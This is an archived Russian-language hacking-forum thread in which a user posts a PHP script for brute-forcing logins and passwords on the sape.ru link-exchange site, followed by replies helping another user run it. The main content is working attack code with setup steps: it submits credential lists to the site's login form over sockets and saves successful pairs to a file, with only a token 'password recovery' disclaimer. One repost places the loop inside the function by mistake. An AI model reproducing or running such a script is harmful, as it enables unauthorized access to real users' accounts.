PDA

Просмотр полной версии : Брут sape


-Hormold-
07.06.2008, 00:20
Посмотрел тему про begun и вспомнил что писал брут sape ;)
Жалко без потоков и медленно...

1.Заливаем файл на хост.
2.Создаём pass.txt,good.txt,login.txt с chmod 777!
3.Заполяем нужные файлы и включаем брут!

Что бы брутить логины к паролю:

$login=file("login.txt");
$pass="qwerty";
for($i=0;$i<count($login);$i++){
$login[$i]=trim($login[$i]);
if(login($login[$i],$pass)){$fp=fopen('good.txt','ab');fwrite($fp,$lo gin[$i].':'.$pass."\r");fclose($fp);}
}

Что бы брутить пароли к логину:

$login="admin";
$pass=file("pass.txt");
for($i=0;$i<count($pass);$i++){
$pass[$i]=trim($pass[$i]);
if(login($login,$pass[$i])){$fp=fopen('good.txt','ab');fwrite($fp,$login.': '.$pass[$i]."\r");fclose($fp);echo "password found!! this is ".$pass[$i];exit();}
}


Сама функция проверки:


function login($login,$pass){
$data = "act=login&login=$login&passwd=$pass";
$len = strlen($data);
$re = "POST http://sape.ru/login.php HTTP/1.0\nHost: sape.ru\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b1; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\nKeep-Alive: 300\n".
"Connection: keep-alive\nReferer: http://sape.ru/\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: $len\n\n$data";

$fp = fsockopen("sape.ru", 80, $errno, $errstr, 30);
fwrite($fp, $re);
$he="";
while (!feof($fp)) {
$he.=fgets($fp, 10240);
}
fclose($fp);
if ( preg_match ("/Ошибка/i" , "$he")) { $debug=0;$re=false;}
elseif ( preg_match ("/sites.php/i" , "$he")) {$debug=1; $re=true;}


return $re;
}


P.S. За то что вы делаете , автор не отвечает. Написанно только для вспоминания пароля.

mad_xakep
07.06.2008, 11:15
а мож выложить список возможных логинов ну че нить подобное, я протестить хочу

XAOCX
08.05.2009, 12:57
function login($login,$pass){ $data = "act=login&login=$login&passwd=$pass"; $len = strlen($data); $re = "POST http://sape.ru/login.php HTTP/1.0\nHost: sape.ru\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b1; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\nKeep-Alive: 300\n". "Connection: keep-alive\nReferer: http://sape.ru/\n". "Content-Type: application/x-www-form-urlencoded\n". "Content-Length: $len\n\n$data"; $fp = fsockopen("sape.ru", 80, $errno, $errstr, 30); fwrite($fp, $re); $he=""; while (!feof($fp)) { $he.=fgets($fp, 10240); } fclose($fp); if ( preg_match ("/Ошибка/i" , "$he")) { $debug=0;$re=false;} elseif ( preg_match ("/sites.php/i" , "$he")) {$debug=1; $re=true;} return $re; } $login=file("login.txt"); $pass="qwerty"; for($i=0;$i<count($login);$i++){ $login[$i]=trim($login[$i]); if(login($login[$i],$pass)){$fp=fopen('good.txt','ab');fwrite($fp,$lo gin[$i].':'.$pass."\r");fclose($fp);} }






Вот что показывает

inlanger
08.05.2009, 13:24
ну ты хотя бы <? ?> поставь )

XAOCX
08.05.2009, 13:38
И что ?

art2222
08.05.2009, 16:09
И что ?
И не будет так показывать =\

DDoSька
08.05.2009, 16:59
И что ?
Такой гордый. Грин наверно :(

iron-viper
08.05.2009, 17:45
lol моя в дауне с таких "И что?" xD
как поет Noize MC "...спиздил дома рубль, а крику будто выставил обменник..."

DDoSька +

wildshaman
08.05.2009, 17:47
Давайте теперь каждый, кто начится курлу, выкладывать по элементарному бруту к какому-нибудь сайту?

inlanger
08.05.2009, 17:50
А почему бы и нет?

wildshaman
08.05.2009, 17:51
А почему бы и нет?

А смысл? имхо одна функция - не скрипт...

inlanger
08.05.2009, 17:58
Для тех, кто учится - скрипт, да ещё какой!

wildshaman
08.05.2009, 18:04
Для тех, кто учится - скрипт, да ещё какой!

ну так кидать такое в "Полезные скрипты", а не делать отдельный топик :)

mr.The
08.05.2009, 18:33
вы ниразу не археологи, не =\

Sharky
09.05.2009, 16:16
Давайте теперь каждый, кто начится курлу, выкладывать по элементарному бруту к какому-нибудь сайту?
а теперь покажи мне тут курл умник :) кто-то выучил умные слова и не отличает курл от сокетов? ооооооой какие мы умные

wildshaman
09.05.2009, 16:21
а теперь покажи мне тут курл умник :) кто-то выучил умные слова и не отличает курл от сокетов? ооооооой какие мы умные


я особо не рассматривал, сначала показалася реально curl :)
ну сокеты, одна муть )

XAOCX
12.05.2009, 13:32
"И что ?" - озночает то что не получилось =)

Помогите пожалуйста сделать под "Что бы брутить пароли к логину"

Tigger
12.05.2009, 14:14
"И что ?" - озночает то что не получилось =)

Помогите пожалуйста сделать под "Что бы брутить пароли к логину"


<?php
сам скрипт
?>

XAOCX
12.05.2009, 14:30
<?php
function login($login,$pass){
$data = "act=login&login=$login&passwd=$pass";
$len = strlen($data);
$re = "POST http://sape.ru/login.php HTTP/1.0\nHost: sape.ru\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b1; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\nKeep-Alive: 300\n".
"Connection: keep-alive\nReferer: http://sape.ru/\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: $len\n\n$data";

$fp = fsockopen("sape.ru", 80, $errno, $errstr, 30);
fwrite($fp, $re);
$he="";
while (!feof($fp)) {
$he.=fgets($fp, 10240);
}
fclose($fp);
if ( preg_match ("/Ошибка/i" , "$he")) { $debug=0;$re=false;}
elseif ( preg_match ("/sites.php/i" , "$he")) {$debug=1; $re=true;}

$login="???";
$pass=file("pass.txt");
for($i=0;$i<count($pass);$i++){
$pass[$i]=trim($pass[$i]);
if(login($login,$pass[$i])){$fp=fopen('good.txt','ab');fwrite($fp,$login.': '.$pass[$i]."\r");fclose($fp);echo "password found!! this is ".$pass[$i];exit();}
}

return $re;
}

?>

Так ?

Ru}{eeZ
12.05.2009, 15:50
lol моя в дауне с таких "И что?" xD
как поет Noize MC "...спиздил дома рубль, а крику будто выставил обменник..."

DDoSька +

Блатняк ;)
п.с. читает))

inlanger
12.05.2009, 17:16
Так ?
так. А что делаешь с тем, что написал? Сохраняешь в пхп и запускаешь на сервере?

eLWAux
12.05.2009, 17:27
археологи мля..
з.ы.: теперь страничка авторизации находится тут https://auth.sape.ru/login/ а не https://auth.sape.ru/login.php

XAOCX
13.05.2009, 07:21
так. А что делаешь с тем, что написал? Сохраняешь в пхп и запускаешь на сервере?

Угу,пытаюсь.

Sharky
13.05.2009, 11:10
брут не актуален

inlanger
13.05.2009, 13:44
Так бы сразу )